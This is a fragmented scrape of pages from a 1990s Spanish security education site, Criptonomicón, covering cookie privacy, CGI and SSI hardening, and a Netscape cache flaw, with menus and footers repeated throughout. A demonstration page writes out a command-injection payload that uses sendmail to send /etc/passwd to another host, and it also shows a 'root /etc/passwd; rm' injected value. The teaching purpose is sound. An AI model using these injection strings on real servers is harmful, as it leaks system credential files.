evidente que con el paso del tiempo, estos anuncios se volvern extraordinariamente
personales.
ltimamente, los motores de bsqueda ms populares estn participando en la red
DoubleClick, de manera que tambin nuestras bsquedas quedan registradas. Por
ejemplo, si busco informacin sobre Mozart, Vivaldi y Bach, podran empezar a
aparecerme anuncios sobre CDs de msica clsica.
A pesar de todo, la propaganda de DoubleClick nos asegura que los usuarios ganan
tambin, puesto que ven solamente los mensajes adecuados a su perfil. Habra que ver
si se trata de una ganancia para el usuario... o para el anunciante.
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad,
por favor consulte la declaracin de poltica sobre privacidad.
Principal
Qu son
Usos
Ejemplos
A dieta
Recursos
Reverso tenebroso
Riesgos imaginarios
Riesgos reales
Buenas intenciones
Marketing
En cualquier caso, lo ms inquietante es toda esa informacin
personalizado
sobre nuestra actividad en la Red e inclinaciones personales y el
uso que se le podra dar. Cada vez que pinchamos en un anuncio o Gran herramienta o
amenaza?
visitamos una pgina, un registro podra estar actualizndose en
La Gran Cookie nos
alguna parte, anotando cuidadosamente nuestros pasos. El salto
vigila
hacia la violacin de la intimidad consiste simplemente en
Histeria colectiva
imaginar toda esta informacin acerca de los hbitos de navegacin
y consumo de un usuario centralizada en una oficina. Aunque, como se ha explicado,
una cookie no puede ser usada por estas compaas de marketing personalizado para
extraer nuestro nombre, telfono o direccin de correo electrnico, s que podran
conocerlos por otros mecanismos, combinarlo con la informacin que s consiguen de
nosotros sobre nuestros gustos y preferencias, y todo ello almacenarlo y procesarlo
convenientemente en una gran base de datos. Ahora s que para algunos se est
violando nuestra intimidad. Si se aade el hecho de que en general todo ocurre sin
conocimiento del usuario, el anonimato y la intimidad en la Web son un cuento de
viejas. Ms an si se sabe que estos perfiles se pueden vender a terceros.
respetable.
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad,
por favor consulte la declaracin de poltica sobre privacidad.
Principal
Qu son
Usos
Ejemplos
A dieta
Recursos
Reverso tenebroso
Riesgos imaginarios
Histeria colectiva
Riesgos reales
Buenas intenciones
Marketing
Cules son las consecuencias de esta histeria colectiva? Si alguien
personalizado
disea un sitio Web cuya funcionalidad descansa principalmente
sobre las cookies, qu pasar si la mayora de la gente desactiva Gran herramienta o
amenaza?
las cookies? Pues ese sitio ya no funcionar como debera. Os
La Gran Cookie nos
acordis de ese mensaje que aparece en la ventana del Explorer
vigila
cuando nos advierte de la inminente llegada de una cookie? Si
Histeria colectiva
hace clic en No, la pgina que intenta ver podra no mostrarse
correctamente. Y as es. Qu opciones nos quedan entonces? Escribir scripts
muchsimo ms complicados, con eventuales agujeros de seguridad? Monopolizar un
ancho de banda todava mayor, enviando gigantescos campos ocultos de formularios
adelante y atrs? Pues no, lo ms probable es que se olvidarn de esta clase de
personalizacin de las pginas, con el resultado final de que la Red perder en calidad
y simplicidad de manejo. En resumen, perdemos todos.
En conclusin, sera deseable que cada sitio que utiliza una cookie advierta a sus
clientes de lo que est haciendo. Al fin y al cabo, no todos tienen ni quieren ofrecer
informacin sobre sus hbitos de navegacin.
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad,
por favor consulte la declaracin de poltica sobre privacidad.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Informacin adicional
OpenDVD.org
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Informacin adicional
Monederos electrnicos
CAFE
CEPS
Mondex
Micropago
IBM Micro Payments
MilliCent
NetBill
Monedas electrnicas
eCash
CAFE
NetCash
Cheques electrnicos
NetCheque
NetChex
PayNow
Tarjeta de crdito
CyberCash
SET
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Informacin adicional
Especificaciones CEPS
Comercio electrnico
Borrar
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Informacin adicional
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Informacin adicional
WAP Forum
PortalWAP
Phone.com
Nokia
Borrar
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Informacin adicional
WAP Forum
Tu nombre:
Enviar
Borrar
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Informacin adicional
Borrar
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Informacin adicional
Seguridad en CGI
Perfecto
Borrar
Qu es CGI
Riesgos de CGI
CGIs seguros
SSI
Consejos
Recursos
Qu son
Las directivas de Server-Side Includes (SSI) constituyen
Qu son
poderosas herramientas para aumentar la productividad del
programador, ya que permiten al servidor modificar
Peligros
automticamente el documento solicitado antes de ser enviado al
Soluciones
navegador del cliente. Su propsito principal es insertar dentro de
las pginas Web el contenido de ficheros de texto, informacin
dinmica sobre ficheros (como por ejemplo su tamao) o la salida resultante de la
ejecucin de ciertos comandos del sistema ya preseleccionados o libres. Los
Server-Side Includes pueden contener a su vez otros Server-Side Includes, de forma
que se puede llegar a introducir una cantidad enorme de texto en una pgina con la
inclusin de un nico comando.
Los Server-Side Includes insertan el texto en el fichero exactamente en el mismo
sitio donde aparecen. En otras palabras, se reemplazan a s mismos en el instante en
que se sirven las pginas que los contienen.
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es CGI
Qu es CGI
Riesgos de CGI
CGIs seguros
SSI
Consejos
Recursos
Descripcin
La interfaz de pasarela comn (Common Gateway Interface, CGI)
Descripcin
es un protocolo genrico que permite extender las capacidades de
HTTP. Los programas en CGI aaden funcionalidad al servidor
Mecanismo de CGI
Web, funcionalidad que podra abrir agujeros de seguridad en el
servidor, ya que una aplicacin en CGI mal diseada podra permitir acceso total o
parcial al servidor.
A lo largo de estas pginas hablaremos en general de aplicaciones y programas en
CGI, si bien suele distinguirse entre programas (programs) y guiones (scripts). Los
primeros se consideran escritos en algn lenguaje compilado como C, mientras que
los segundos son los escritos en un lenguaje interpretado como Perl. Ms adelante
discutiremos las ventajas e inconvenientes desde el punto de vista de la seguridad
que plantea cada una de las dos formas de escribir las aplicaciones en CGI
(programas o guiones).
En general, es necesaria la presencia de dos elementos, una pgina Web en formato
HTML con un formulario donde el usuario introduce sus datos, y un programa CGI
en el servidor, que recibe y procesa los datos del usuario.
En la siguiente pgina se muestra desde una perspectiva de alto nivel cmo funciona
el mecanismo de entrega y procesamiento de datos en un programa CGI.
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es CGI
Riesgos de CGI
CGIs seguros
SSI
Consejos
Recursos
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es CGI
Riesgos de CGI
CGIs seguros
SSI
Consejos
Recursos
Objetivos
Visto cules son los riesgos a que atenerse, los objetivos que nos
guiarn a la hora de escribir CGI's seguros se resumen en los
siguientes:
Los programas SOLAMENTE deben ejecutar aquellas
acciones para las que ha sido concebido.
No se debe revelar ms informacin al cliente que la que
DELIBERADAMENTE se desee suministrar.
No se debe confiar en la informacin procedente de los
datos introducidos por el cliente.
Se debe minimizar el dao potencial al sistema en su
conjunto si se produce un ataque con xito.
Iremos viendo a continuacin de forma ms detallada cmo hacer
para que nuestros CGI's cumplan con los objetivos impuestos.
Objetivos
Servidor
Usuario
Lenguajes
Caminos y nombres
Llamada a programas
Envo de datos
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos y orientaciones
Qu es CGI
Riesgos de CGI
CGIs seguros
SSI
Consejos
Recursos
Consejos y Orientaciones
Cmo decir si un CGI es seguro
1.
2.
3.
4.
5.
6.
Es muy complejo?
Lee o escribe ficheros en el servidor?
Interacta con otros programas del sistema?
Corre con privilegios suid?
Se valida la entrada procedente de formularios?
Se emplean nombres de camino explcitos?
A evitar
Nunca se debe pasar como argumento a un comando del shell la entrada del
usuario sin filtrarla antes.
Ni siquiera se puede confiar en las variables de entorno.
No revelar demasiada informacin sobre el sistema, con servicios como:
finger
w
ps
En lenguajes compilados, evitar suposiciones acerca del tamao de la entrada
del usuario, ya que en caso contrario pueden ocurrir desbordamientos de bfer.
Consejos y orientaciones
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es CGI
Riesgos de CGI
CGIs seguros
SSI
Consejos
Recursos
CGI Security
Captulo 9 del libro CGI Developer's Guide por Eugene Eric Kim.
CGI Security
Coleccin de punteros a recursos sobre seguridad en CGI.
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Ejemplo mejorado
char* read_POST() {
int query_size = atoi( getenv( "CONTENT_LENGTH" ) );
char* query_string = (char*) malloc( query_size );
if (query_string != NULL)
fread( query_string, query_size, 1, stdin);
return query_string;
}
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad, por favor consulte la
declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de visitas. Para contribuir al Criptonomicn, lea la pgina de
contribuciones.
Consejos y orientaciones
Qu es CGI
Riesgos de CGI
CGIs seguros
SSI
Consejos
Recursos
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es CGI
Riesgos de CGI
CGIs seguros
SSI
Peligros
En la prctica, los Server-Side Includes permiten toda clase de
trucos cuando se combinan con CGIs que modifican pginas
Web, como en el escenario del libro de visitas: los visitantes a una
pgina disponen de un "libro" en el que pueden dejar un texto, que
en principio podra incluir etiquetas en HTML y tambin, si la
entrada no se filtra, includes como los siguientes:
Qu son
Peligros
Soluciones
Consejos
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es CGI
Soluciones
Riesgos de CGI
Qu son
Peligros
CGIs seguros
SSI
Consejos
Recursos
Soluciones
Otra posibilidad es utilizar como archivos con SSI slo los que posean una extensin
determinada, como por ejemplo .shtml. De esta forma, mientras las pginas posean
extensin .html no existe riesgo de ataque mediante fallos en CGI, ya que se limitan
a los archivos con extensin .shtml.
En el caso del libro de visitas, para que el ataque tenga xito, el libro debera tener
extensin .shtml, lo cual resulta muy improbable.
Por ltimo, se pueden mantener los SSI y velar en los programas CGI por que no se
produzcan entradas indeseadas, filtrando caracteres como ;, <, >, , -, #, @, , `, /, etc.
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es CGI
Riesgos de CGI
CGIs seguros
SSI
Consejos
Recursos
Objetivos
Servidor
Usuario
Lenguajes
Caminos y nombres
Llamada a programas
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es CGI
Riesgos de CGI
CGIs seguros
SSI
Consejos
Recursos
Objetivos
Servidor
Usuario
El ejemplo ms explotado en el mundo de los CGI es la
manipulacin de formularios: los formularios normalmente
Lenguajes
presentan una serie de campos dentro de los cuales se puede
escribir texto, as como listas desplegables, botones de seleccin,
Caminos y nombres
etc. Un error muy comn entre los programadores novatos
consiste en asumir que la entrada del programa CGI provendr de
Llamada a programas
los datos rellenados por el usuario a partir del formulario. Sin
embargo, resulta muy sencillo cargar en el disco local la pgina
Envo de datos
HTML con el formulario y manipularla a voluntad (por ejemplo
variando los campos ocultos), o bien directamente introducir los datos manipulados
en la ventana del URL, modificando los argumentos esperados por el CGI. Por lo
tanto, debe tenerse en cuenta lo siguiente:
Si se crea una lista de seleccin, la entrada de ese campo puede no ser una de
las opciones de la lista.
Si se especifica la mxima longitud de un campo, el usuario podra enviar ms
caracteres de los prefijados, manipulando el formulario o invocando al CGI
directamente.
Los campos que el CGI espera encontrar en la variable QUERY_STRING
podran ser distintos de los presentados por el formulario, ya que el usuario los
puede alterar, aadiendo o borrando campos.
Los valores de las variables de entrada al CGI podran contener caracteres
especiales, como <, >, , -, #, @, ', `, /, etc. Esto incluye a variables de entorno
como el HTTP_REFERER, nombre de host, direccin de host, etc.
Por supuesto, no hay que olvidar de vista el problema de las llamadas a programas
manipuladas, como veremos ms adelante.
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu lenguaje utilizar
Qu es CGI
Riesgos de CGI
CGIs seguros
SSI
Consejos
Recursos
Qu lenguaje utilizar
A menudo se plantea la discusin de qu lenguaje resulta el ms
Objetivos
adecuado a la hora de escribir CGI's seguros. En una primera
aproximacin, puede considerarse a los lenguajes compilados
Servidor
como ms seguros por las siguientes razones:
Usuario
Impiden el acceso remoto al cdigo fuente del CGI, lo cual
limita las posibilidades de un hacker de conocer cmo
Lenguajes
funciona internamente el programa.
Los guiones escritos en lenguajes interpretados son ms
Caminos y nombres
complejos y propensos a errores cuando crecen,
aumentando la probabilidad de que contengan agujeros de
Llamada a programas
seguridad.
Los lenguajes interpretados facilitan la labor de abrir shells,
Envo de datos
ejecutar comandos y capturar sus resultados, lo que
constituye uno de los mayores riesgos potenciales de los CGI's. Por el
contrario, en C supone un esfuerzo mayor invocar comandos del sistema y es
ms difcil que la entrada del usuario engae al programa.
No obstante, no hay que olvidar que los lenguajes interpretados son ms sencillos de
entender y rpidos de probar (ya que no necesitan pasar por todo el proceso de
compilacin y enlazado), y adems su manejo de cadenas es mucho ms sofisticado,
lo que los hace menos propensos a errores con bferes de texto.
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es CGI
Riesgos de CGI
CGIs seguros
SSI
Caminos
Consejos
Recursos
Nombres de ficheros
Objetivos
Servidor
Usuario
Lenguajes
Caminos y nombres
Llamada a programas
Envo de datos
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Llamada a progamas
Qu es CGI
Riesgos de CGI
CGIs seguros
SSI
Consejos
Recursos
Llamada a progamas
Una de los aspectos ms potentes de la programacin en CGI es la
capacidad de las aplicaciones de invocar utilidades del sistema u
otros programas, con la posibilidad de capturar su salida. Sin
embargo, desgraciadamente, esta libertad puede convertirse en un
arma de doble filo, ya que resulta igualmente sencillo subvertir los
argumentos de esos comandos, de manera que se produzcan
acciones inesperadas e indeseables.
Dependiendo del lenguaje de programacin empleado, existen
varias formas de invocar comandos:
En C, las funciones popen( ) y system( ) sirven para abrir un shell
que procese los comandos que se le pasen como argumentos. Por
su parte, en Perl, adems de las funciones anteriores, se dispone
de open( ) con tubera, exec( ) y eval( ), as como de las comillas
hacia atrs "`".
Objetivos
Servidor
Usuario
Lenguajes
Caminos y nombres
Llamada a programas
Envo de datos
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Llamada a progamas
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Qu es CGI
Riesgos de CGI
CGIs seguros
SSI
Consejos
Recursos
Objetivos
Servidor
Usuario
Lenguajes
Caminos y nombres
GET POST
S
N
S
N
S
N
S
N
N
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin20.txt
******************************************
1. La navegacin por Internet, al descubierto
La semana pasada fue hallado un nuevo agujero de seguridad en el
navegador de Netscape por Dan Brumleve, un consultor informtico
independiente de Sunnyvale, California, de 20 aos de edad. Anunci su
descubrimiento en un mensaje enviado a los grupos de news
(http://www.shout.net/~nothing/cache-cow/article.txt): un fallo en la
implementacin de JavaScript del navegador de Netscape que permite que
cualquiera pueda leer los contenidos de tu cach, donde se almacenan las
direcciones de los sitios Web que has visitado e incluso la informacin
confidencial que hayas introducido en los formularios, como passwords,
tarjetas de crdito y otros datos personales, siempre y cuando no hayan
sido protegidos utilizando un software criptogrfico. La amenaza a la
intimidad personal que representa este fallo es tremenda, ya que, en
cierto sentido, el cach almacena la informacin de lo que has estado
haciendo en la Web durante las ltimas semanas (la mayor o menor
cantidad de informacin depender del tamao del cach, configurable por
el usuario) y gracias al agujero podra caer en manos poco escrupulosas.
Podis comprobar qu contiene exactamente el cach escribiendo
about:cache o about:global en el recuadro de direccin del
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin20.txt
navegador.
El fallo afecta a todas las versiones del navegador de Netscape
anteriores a la 4.06, pero no a Microsoft Internet Explorer.
Netscape confirm la existencia del fallo y anunci que lo solucionara
cuando lanzase la versin final de Netscape Communicator 4.5, lo cual
ocurrir muy pronto.
En sus declaraciones a la prensa, Brumleve afirm que este fallo le
preocupa porque significa que un sitio Web de elevado trfico podra
utilizarlo para averiguar a qu otros sitios Web van sus visitantes.
Dijo que incluso podra ser utilizado por los jefes para comprobar si
sus empleados han estado buscando pornografa, por ejemplo.
Richard M. Smith, director de Phar Lap Software Inc.
(http://www.pharlap.com/), sugiri que el fallo podra ser explotado
incluso usando correos en formato HTML o mensajes a grupos de noticias
como Usenet, aumentando as significativamente el riesgo para la
intimidad de los usuarios de Internet.
En palabras de Marc Rotenberg, director de Electronic Privacy
Information Center (http://www.epic.org), es ste un problema muy serio
de privacidad, que pone de relieve la actual falta de estndares
tcnicos adecuados para proteger la privacidad en lnea.
Solucin
Ahora mismo, y mientras Netscape no lance un parche, existen dos nicas
maneras de protegerse:
a) Desactivar JavaScript del navegador:
Seleccionar Editar-->Preferencias-->Avanzadas y ah eliminar la confirmacin
de la casilla Activar JavaScript.
b) Establecer el valor del cach a 0:
Seleccionar Editar-->Preferencias-->Avanzadas-->Cach y ah establecer los
valores de cach de memoria y de disco a 0 (ah, y no olvides pulsar los
botones de limpiar cach de memoria y limpiar cach de disco).
No es necesario desactivar Java, ya que este fallo no tiene nada que ver
con ese otro lenguaje.
Ms informacin
La pgina Web creada por el propio Brumleve para demostrar su
funcionamiento, con ejemplos y explicaciones, as como el cdigo fuente
para reproducirlos, disponible en:
http://www.shout.net/~nothing/cache-cow/
(Mi agradecimiento a Manuel Porras por llamar mi atencin sobre la noticia)
******************************************
2. Mster de Especialista en Criptografa en la UCM
El ttulo propio de "Especialista en Criptografa" que ofrecer la Universidad
Complutense de Madrid trata de satisfacer el inters creciente que desde distintos
sectores de la actividad cientfica e industrial ha despertado el desarrollo de la
Criptografa, sus implicaciones matemticas, que han creado autnticas nuevas
especialidades y sus aplicaciones en el mundo de las comunicaciones.
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin20.txt
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin20.txt
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin20.txt
******************************************
(C) Copyright 1998 Criptonomicn
http://www.iec.csic.es/criptonomicon
Un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC por
Gonzalo lvarez Maran
email: gonzalo@iec.csic.es
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Crashes
Agujeros
y nos devolvera todas las lneas (registros) que contuviesen en alguno de sus campos
la palabra "gonzalo".
El siguiente paso consistira en automatizar el proceso desde una pgina Web, de
manera que cualquier usuario pudiese realizar consultas.
Para ello, se le presenta al usuario el siguiente formulario:
Spam
Remailers
Enviar
Anonimato
Restablecer
Correo seguro
Web seguro
root /etc/passwd; rm
Referencias
Libro de Visitas
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Vulnerabilidad en CGI
Suscripcin gratis
Intimidad?
Artculos
Vulnerabilidad en CGI
Imagnate que quiero enviar un correo a alguna de las siguientes personas:
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Gonzalo lvarez
Fausto Montoya
Alberto Peinado
enviar correo
Si en vez de apretar el botn de Enviar, examino el cdigo HTML para ver lo que hace
el formulario, veo que podra engaar al CGI escribiendo:
http://www.iec.csic.es/cgi-bin/vulnerable.exe?destinatario
= gonzalo@iec.csic.es; sendmail -t
gonzalo@pampaneira.iec.csic.es < /etc/passwd;
Puedes hacer la prueba, poniendo tu direccin de correo o mandando ejecutar
cualquier otro comando del shell.
Nota: Si no funciona, prueba a sustituir los espacios por '%20'.
Otra posibilidad que tienes es guardar esta pgina en tu disco duro local. A
continuacin, edtala y en la lnea siguiente:
<input type = radio name = "destinatario" value =
"gonzalo@iec.csic.es" checked>Gonzalo lvarez<br>
sustituyes el contenido de value por lo siguiente:
Remailers
gonzalo@iec.csic.es; sendmail -t
gonzalo@pampaneira.iec.csic.es < /etc/passwd;
Anonimato
Correo seguro
Web seguro
Nota: Si no funciona, prueba a sustituir los espacios por '%20', al igual que antes.
En vez de punto y coma, ";", se pueden separar los comandos por retornos de carro,
que de hecho es la forma ms natural. En el caso de HTTP, en la cadena de URL los
retornos de carro se codifican como "%0a". Por lo tanto, es importante no olvidarse de
filtrar en la entrada tambin los carateres de retorno de carro y alimentacin de lnea,
"\n" y "\r", ya que en caso contrario, si nos olvidamos de ellos, podra ocurrir que
Vulnerabilidad en CGI
Consejos prcticos
Referencias
Libro de Visitas
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad,
por favor consulte la declaracin de poltica sobre privacidad.
Ataque REFERER
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
